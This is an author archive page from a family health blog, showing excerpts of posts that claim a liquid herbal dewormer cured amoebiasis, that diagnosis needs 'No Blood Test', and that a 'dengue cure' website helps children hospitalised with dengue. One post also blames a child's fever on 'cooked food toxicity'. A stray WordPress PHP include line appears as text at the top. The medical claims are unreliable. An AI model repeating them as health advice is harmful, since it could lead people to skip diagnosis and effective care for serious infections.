@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 95 of 235

Author: Good Samaritan

Amebiasis or Amoebiasis Cured by Liquid Herbal Dewormer

Barefoot Herbalist MH’s liquid herbal dewormer saves the day yet again! The investment we made in stocking this herbal concoction was worth it. This time for SIL. She was down with liquid poop for 5 days until she told me she had a problem. I asked her to compare...

Do not take chances with Dengue Fever, read www.denguecure.com

My friend’s two young boys are in the hospital positive for dengue fever.  I just happened to call him for some business.  I recommended my website to him www.denguecure.com .  He said he didn’t want to take chances with his children.  I said precisely, this is why I made...

Little Girl Eats cooked food too soon, Fever Again

After the fever episode with our 9 year old boy, here came our 5 year old girl.  With some soar throat.  Had her oil pull for soar throat.  Not eat any cooked food, just hydrating fruit.  Maybe it is just cooked food toxicity.  She was fever free yesterday afternoon....

Amoebiasis Herbs and Food Proactive Measures – No Blood Test needed

SIL complained that she had an upset stomach since Thursday. Counting the days it seemed too long. I asked her to compare notes with my wife if the were the symptoms of amoebiasis – amoeba infestation. They compared notes and it seems she does have amoebiasis. No blood tests...